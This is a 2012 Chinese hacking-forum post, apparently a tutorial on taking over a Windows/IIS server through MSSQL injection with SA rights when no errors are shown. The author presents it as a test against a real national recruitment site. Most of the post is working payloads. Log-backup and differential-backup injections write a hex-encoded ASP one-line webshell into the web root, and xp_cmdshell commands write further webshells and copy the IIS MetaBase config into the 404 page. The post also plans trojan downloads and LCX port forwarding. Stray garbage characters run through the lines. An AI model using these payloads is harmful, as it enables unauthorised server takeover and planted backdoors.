找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2308|回复: 0
打印 上一主题 下一主题

sa权限的教程.

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:30:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————3 E( M6 I# p7 g
7 _! i2 n# c; u4 w- [

! d( O  S# R0 I6 Z' {                                                             欢迎高手访问指导,欢迎新手朋友交流学习。: e+ N  K6 ~4 ?& x- P* l! t$ t
/ F) _5 c  j* z1 t& R4 ^
                                                                 + T6 P6 T, @: k; R4 |1 k; l
                                                                 ! Z% w6 O: `8 R) L
                                                                  论坛: http://www.90team.net/
: s2 n4 _6 S$ Y! a" k4 O% Q9 Y8 B4 q. U" c7 }
4 R1 ]# r* Z6 Y4 A1 a  I
, ?& B# U. M) \4 ?
友情检测国家人才网
8 z; E( }7 W9 N+ R
  o1 e* l; j% W* r5 d3 V3 j4 i) W7 Z$ v2 i* y9 ?: e' _( z  s
内容:MSSQL注入SA权限不显错模式下的入侵" Z* |# E- Q0 S8 F) ~0 W6 i# O" j
" P6 A9 q, L: T4 A
  s2 X( V* X% O: i5 |) i8 p8 ?! w
一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。0 B. Q; E; E. Z! X) [  \) m
$ _! i8 M5 q2 K. |+ c1 v" H
我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。4 G! i. M& u& K) v

7 S! b% u* D% x1 H1 C: S7 ^# y- k. K0 O
这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003,IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。
" w$ f/ k% L' V( N7 I1 o$ f  A. z5 I- X6 r$ r* r) `
思路:! b1 G* y3 T3 O
8 [3 d5 i1 B/ {$ A' G$ T* B
首先:# ]( B( |0 f+ @2 Y- T
6 M5 n5 _! r6 T, U
通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面,然后访问WEB站点的一个不存在的目录得到命令执行结果,刺探服务器信息。% S+ R' r- \8 g: j/ K" T

( i; h9 Y0 W6 d0 G6 j1.日志备份获得Webshell
5 c; K; g5 l, m# M+ I0 E# Y( B1 v, L
2.数据库差异备份获得Webshell
  I0 x9 }( o- j4 _, a+ Q  \# Z+ p$ D6 C& }7 Z, r
4.直接下载免杀远控木马。  Y' Y4 A' R+ H3 ]0 d

: w3 Q( P9 q2 w5.直接下载LCX将服务器端口转发出来# T' M8 M0 c# Y+ u! O" U# Z2 V
1 `0 R& w0 k# P5 w: @
6.通过XP_CMDSHELL 执行命令读取iis配置文件(C:\Windows\system32\inetsrv\MetaBase.xml )分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。
9 o6 F, R( h! U+ X, j- k* B/ K- A1 z% u9 p- a5 w# J
8 r" [1 o. p1 ]( v

- T" Z: A5 c* g) u在这里我就不浪费大家时间了,我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了,
3 n1 S- r$ x$ f+ }3 m. G/ u, n6 E; k4 [4 B, k, W
我直接演示后面一个方法
0 K2 [5 B$ ~1 ]  f" o
/ q3 u0 a# O2 m! R6 U6 v4 h. ?* s9 Z/ H+ @
分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL
( Z7 v2 y2 Z3 i: i( J
+ H: R6 D" j3 P- `( t4 `+ u. ~4 \1 M1 F0 s. H& ?
( P+ q; t. I5 T  o  D( }8 r
4 R1 {% l9 m; T" }
◆日志备份:( z1 g+ P0 M0 A& Q' F4 V* W4 B4 w

& O% d3 f2 ~9 }# S9 y
5 k9 e" i& O$ u# L1. 进行初始备份
5 h6 k7 I, c* ~; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--7 o* ]# L' g( X: N2 e) G
3 B5 W) C8 G) g) n) k' F: P
2. 插入数据
# t9 H( }, {' F1 x2 j;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--+ M/ I4 N0 h. J0 M* T/ f$ Q
3 x7 k( O! }& L! D* S
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
  ~; a* Y& w) \) K  
( j  o' v1 A0 [3 p* x  u" E3. 备份并获得文件,删除临时表
! ~" L' e. h5 ?+ @, r;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--) ?) O# k- R2 H) ~( V: _
4 D# m7 j5 Q  o5 \0 B
' g( _5 Y# }7 V( S: n7 D! y6 t

( S9 J3 B% I8 V+ ]◆数据库差异备份
( G9 l) A) ?6 v! C! O8 b; f
  x8 R" j% E; Z# _6 V) B1 ^(1. 进行差异备份准备工作
9 Y1 h) L9 b& S% j6 j5 E  \' d' A) S, n
;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--: J' R: O9 X8 f. o7 F

& i2 L9 J) `/ e2 g# X6 _' s4 A" ?上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码0 p) y" ]) n2 x5 |

# ~" l& x" y/ U# V: I7 }4 B9 ]- L
(2. 将数据写入到数据库  W" r6 l% e! n# W' f% i9 T4 i
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)-- ) O( S. V* R; Y* ?# I

8 q5 z$ [# l8 Y! w0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>3 x7 \  {" P, Z9 f* z1 L- U5 T
* _9 {' d+ F9 _
3. 备份数据库并清理临时文件' }% v: K+ `' e; D
+ g. L2 ~7 ^- |! P
;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--9 Q- E) e: \6 L' y
, [! i4 a. @0 k
0x633A5C746573742E617370  为 c:\test.asp  删除临时文件
, t6 X5 P/ ]1 `7 ^; r0 Y: e1 M/ i
0 {4 n, v( V5 W
1 x( V1 h& `* M4 o
用^转义字符来写ASP(一句话木马)文件的方法:   
) Y6 g! q" D( E) P6 P: o% ^  }' i- p1 x' H' Z
1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--- W3 L8 U" v# K, R
; w6 [3 O) S3 j" y8 r/ s* [
2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp
9 d5 F) Z, i8 j- ?( d# y5 N; ?6 N% y$ o( a
读取IIS配置信息获取web路径
5 P" l( U! n5 |' p+ Z' l3 m0 F! {: c0 C" u' ?# T# S, G
     # [; u5 s1 ^& b/ [$ T- J9 h
     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--5 o, _# E, m/ E% g) s

# J* R+ X4 D& _( g执行命令
& l& t6 H) H3 B6 o" T     
& T) P! L2 L1 D5 W8 ]. J     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--
* `: G( j6 O* T* |' H( ]4 V$ `8 R1 r8 s
! B8 \" l3 L' V4 x" c( r. k* t
) V* J7 c8 g( G) m+ c1 M
% [, q7 ]( \  V7 z
9 D6 z0 Y* Y! F5 {  d7 S8 x( h+ n) q

8 X! Y! K# z5 Z2 A: d1 Z5 _, Z1 E0 ], i, d

% P& W+ E& V# s# w& b; E# T+ ^6 W+ X
# y6 A+ n7 O6 a1 U; U3 M- m( r
, m1 q7 W; L2 v; A8 Z, T
( U& q) S% |0 T! w$ ~4 T
% f' x9 A9 u' M  y, h1 M

/ Z: B$ H* j" a/ }$ y& k6 W0 ?, c
- o. w0 a4 K5 {" n0 f* w. p
9 f7 t1 |5 z+ S! x: N% C9 D+ V& p# \7 Q$ M" |

. ^* W2 F' y' q; d2 ~. V0 x
7 Q: M# K3 X1 }, ?% L) F( M
9 a5 O! Q; Z0 m" l" ^- J. o6 v* p- W+ r/ ~/ e( K* t* {) a7 l  k" s  e

% [7 @- A  u2 s% e* A* {, K* J% T4 B4 Y9 P5 w- e" r4 ~

5 H3 D2 [  I/ m; q2 Z
" N; L4 f4 z2 b5 T2 c5 W' `# O" i: j4 B6 t- ]- M5 f0 |

" B) Q- L' F. w" l5 v4 a1 s4 h
! L3 B+ I0 @: i) I/ d- Z. V( l( ]+ e. L

  s5 \. ]6 ~3 ~9 S' b, |  r" l
# M, H4 e: p# i- g/ K( G) Q* U6 o5 A( ]- X5 J6 n

0 Q/ O; [, s# d& w7 J$ B: \: O6 |: b" k, x

; V7 u% W8 D0 }$ S7 B( V) q3 V6 S! \1 A; k

* i. z- d% i0 Y! {4 z! v. W( Z' J& z
% u& ~0 I2 G4 R3 R

1 o$ N! B2 d3 o. B6 \5 I3 H3 _) s+ `! q6 @

9 g% v3 T0 _+ L) g8 P  i6 P$ X0 Q  l# ~8 @2 Q* w
1 h% V* B% B! P& `" z7 ]" l5 t% P
( e% j, \+ l: B% B9 T2 h' q2 t

! V6 K7 N2 C6 C7 n) m4 D. y5 t
- g& o# S$ |* k- q8 j' y+ ]8 P: ~, x$ C/ F' O
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表